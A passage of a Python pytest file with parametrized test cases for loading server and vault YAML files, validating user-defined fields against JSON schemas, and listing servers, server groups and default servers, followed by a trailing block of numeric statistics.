server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Invalid format in user-defined portion of item for server srv1.*"
"Validation failed on top-level of user-defined item.*"
"'foo' is a required property"),
None, True
),
(
"Valid file with one server that has incorrect type as per FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=FOO_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedFormatError,
"Invalid format in user-defined portion of item for server srv1.*"
"Validation failed on element 'foo'.*"
"42 is not of type 'string'"),
None, True
),
(
"File with one server and invalid FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" foo: bar\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data=None,
),
(ServerFileUserDefinedSchemaError,
"Invalid JSON schema for validating user-defined portion of server "
"items in server file"),
None, True
),
(
"File with no servers and invalid FOO schema (not recognized)",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
group_user_defined_schema=None,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
# JSON schema validation of user-defined portion of group items
(
"Valid file with no servers but with FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with two groups that satisfy FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: bar1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" user_defined:\n"
" foo: bar2\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data={
'servers': {
'srv1': {
'description': 'server1',
},
},
'server_groups': {
'grp1': {
'description': 'group1',
'user_defined': {
'foo': 'bar1',
},
'members': ['srv1'],
},
'grp2': {
'description': 'group2',
'user_defined': {
'foo': 'bar2',
},
'members': ['srv1'],
},
},
'default': None,
'vault_file': None,
},
),
None, None, True
),
(
"Valid file with one group that misses user_defined element and FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Missing user_defined element for group grp1"),
None, True
),
(
"Valid file with one group that misses property required in FOO "
"schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined: {}\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Invalid format in user-defined portion of item for group grp1.*"
"Validation failed on top-level of user-defined item.*"
"'foo' is a required property"),
None, True
),
(
"Valid file with one group that has incorrect type as per FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: 42\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=FOO_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedFormatError,
"Invalid format in user-defined portion of item for group grp1.*"
"Validation failed on element 'foo'.*"
"42 is not of type 'string'"),
None, True
),
(
"File with one server and invalid FOO schema",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" user_defined:\n"
" foo: bar\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
exp_data=None,
),
(ServerFileGroupUserDefinedSchemaError,
"Invalid JSON schema for validating user-defined portion of group "
"items in server file"),
None, True
),
(
"File with no groups and invalid FOO schema (not recognized)",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
user_defined_schema=None,
group_user_defined_schema=INVALID_USER_DEFINED_SCHEMA,
exp_data={
'servers': {},
'server_groups': {},
'default': None,
'vault_file': None,
},
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_LOAD)
@simplified_test_function
def test_ServerFile_load(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, user_defined_schema, group_user_defined_schema,
        exp_data):
    """
    Test function for ServerFile._load_server_file()
    """
    # Create the server file (and optional vault file) as temporary files
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as filepath:

        # The code to be tested
        act_result = _load_server_file(
            filepath, user_defined_schema, group_user_defined_schema)

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}". \
            format(testcase.exp_exc_types)

        # The entire loaded data structure must match the expectation
        assert act_result == exp_data
TESTCASES_SF_IS_VAULT_FILE_ENCRYPTED = [
# Testcases for ServerFile.is_vault_file_encrypted()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_result: Expected return valoue of is_vault_file_encrypted().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_encrypted=None,
),
None, None, True
),
(
"Decrypted vault file, no password",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n". \
format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=None,
exp_encrypted=False,
),
None, None, True
),
(
"Encrypted vault file, with correct password",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n". \
format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=TEST_VAULT_PASSWORD,
exp_encrypted=True,
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_IS_VAULT_FILE_ENCRYPTED)
@simplified_test_function
def test_SF_is_vault_file_encrypted(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, exp_encrypted):
    """
    Test function for ServerFile.is_vault_file_encrypted()
    """
    # Create the server file (and optional vault file) as temporary files
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as filepath:
        server_file = ServerFile(filepath, vault_password, use_keyring=False,
                                 use_prompting=False)

        # The code to be tested
        act_result = server_file.is_vault_file_encrypted()

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}". \
            format(testcase.exp_exc_types)

        # Verify the encryption indicator (None when no vault file is used)
        assert act_result == exp_encrypted
TESTCASES_SF_GET_SERVER = [
# Testcases for ServerFile.get_server()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * nick: nickname input parameter for get_server().
# * exp_server_attrs: Dict with expected attributes of Server result
# of get_server().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; existing server nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
),
None, None, True
),
(
"One server group with one server; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'grp1' not found"),
None, True
),
(
"One server with vault file, server exists in vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets={'foo': 'bar'}),
),
None, None, True
),
(
"One server with vault file, server does not exist in vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv2:\n"
" foo: bar\n",
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets=None),
),
None, None, True
),
(
"One server with encrypted vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=TEST_VAULT_PASSWORD,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets={'foo': 'bar'}),
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_GET_SERVER)
@simplified_test_function
def test_ServerFile_get_server(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, nick, exp_server_attrs):
    """
    Test function for ServerFile.get_server()
    """
    # Create the server file (and optional vault file) as temporary files
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as filepath:
        server_file = ServerFile(filepath, vault_password, use_keyring=False,
                                 use_prompting=False)

        # The code to be tested
        act_srv = server_file.get_server(nick)

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}". \
            format(testcase.exp_exc_types)

        # Verify each expected attribute of the returned Server object
        for attr_name, exp_value in exp_server_attrs.items():
            assert getattr(act_srv, attr_name) == exp_value
TESTCASES_SF_LIST_SERVERS = [
# Testcases for ServerFile.list_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * nick: nickname input parameter for list_servers().
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; existing server nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with two servers; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp2',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep; existing group nickname and "
"multiple group memberships",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp2',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_LIST_SERVERS)
@simplified_test_function
def test_ServerFile_list_servers(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, nick, exp_servers_attrs):
    """
    Test function for ServerFile.list_servers()
    """
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as server_filepath:
        esf = ServerFile(server_filepath, vault_password, use_keyring=False,
                         use_prompting=False)

        # The code to be tested
        act_sds = esf.list_servers(nick)

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}".format(testcase.exp_exc_types)

        assert len(act_sds) == len(exp_servers_attrs)

        # Pair up expected and actual servers by sorting both on nickname,
        # then verify every expected attribute on the actual Server object.
        exp_by_nick = sorted(exp_servers_attrs, key=lambda attrs: attrs['nickname'])
        act_by_nick = sorted(act_sds, key=lambda sd: sd.nickname)
        for exp_attrs, act_sd in zip(exp_by_nick, act_by_nick):
            for attr_name, exp_value in exp_attrs.items():
                assert getattr(act_sd, attr_name) == exp_value
TESTCASES_SF_LIST_DEFAULT_SERVERS = [
# Testcases for ServerFile.list_default_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_default_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers, no default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server; no default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server; with default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; server is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; group is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: grp1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_LIST_DEFAULT_SERVERS)
@simplified_test_function
def test_ServerFile_list_default_servers(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, exp_servers_attrs):
    """
    Test function for ServerFile.list_default_servers()
    """
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as server_filepath:
        esf = ServerFile(server_filepath, vault_password, use_keyring=False,
                         use_prompting=False)

        # The code to be tested
        act_sds = esf.list_default_servers()

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}".format(testcase.exp_exc_types)

        assert len(act_sds) == len(exp_servers_attrs)

        # Pair up expected and actual servers by sorting both on nickname,
        # then verify every expected attribute on the actual Server object.
        exp_by_nick = sorted(exp_servers_attrs, key=lambda attrs: attrs['nickname'])
        act_by_nick = sorted(act_sds, key=lambda sd: sd.nickname)
        for exp_attrs, act_sd in zip(exp_by_nick, act_by_nick):
            for attr_name, exp_value in exp_attrs.items():
                assert getattr(act_sd, attr_name) == exp_value
TESTCASES_SF_LIST_ALL_SERVERS = [
# Testcases for ServerFile.list_all_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_all_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with two servers",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep with two servers total",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep with two servers total and "
"multiple group memberships",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
    "desc, kwargs, exp_exc_types, exp_warn_types, condition",
    TESTCASES_SF_LIST_ALL_SERVERS)
@simplified_test_function
def test_ServerFile_list_all_servers(
        testcase, server_filename, server_yaml, vault_filename, vault_yaml,
        vault_password, exp_servers_attrs):
    """
    Test function for ServerFile.list_all_servers()
    """
    with easy_server_file(
            server_filename, server_yaml, vault_filename, vault_yaml,
            vault_password) as server_filepath:
        esf = ServerFile(server_filepath, vault_password, use_keyring=False,
                         use_prompting=False)

        # The code to be tested
        act_sds = esf.list_all_servers()

        # Ensure that exceptions raised in the remainder of this function
        # are not mistaken as expected exceptions
        assert testcase.exp_exc_types is None, \
            "Expected exception not raised: {}".format(testcase.exp_exc_types)

        assert len(act_sds) == len(exp_servers_attrs)

        # Pair up expected and actual servers by sorting both on nickname,
        # then verify every expected attribute on the actual Server object.
        exp_by_nick = sorted(exp_servers_attrs, key=lambda attrs: attrs['nickname'])
        act_by_nick = sorted(act_sds, key=lambda sd: sd.nickname)
        for exp_attrs, act_sd in zip(exp_by_nick, act_by_nick):
            for attr_name, exp_value in exp_attrs.items():
                assert getattr(act_sd, attr_name) == exp_value
| 34.922525
| 80
| 0.483478
| 6,698
| 73,023
| 5.034189
| 0.043744
| 0.060352
| 0.0484
| 0.054094
| 0.900353
| 0.881758
| 0.865862
| 0.858804
| 0.84703
| 0.837273
| 0
| 0.010609
| 0.429467
| 73,023
| 2,090
| 81
| 34.939234
| 0.798737
| 0.10194
| 0
| 0.832606
| 0
| 0.000545
| 0.225226
| 0.004317
| 0
| 0
| 0
| 0
| 0.009815
| 1
| 0.003817
| false
| 0.045802
| 0.003817
| 0
| 0.007634
| 0.000545
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
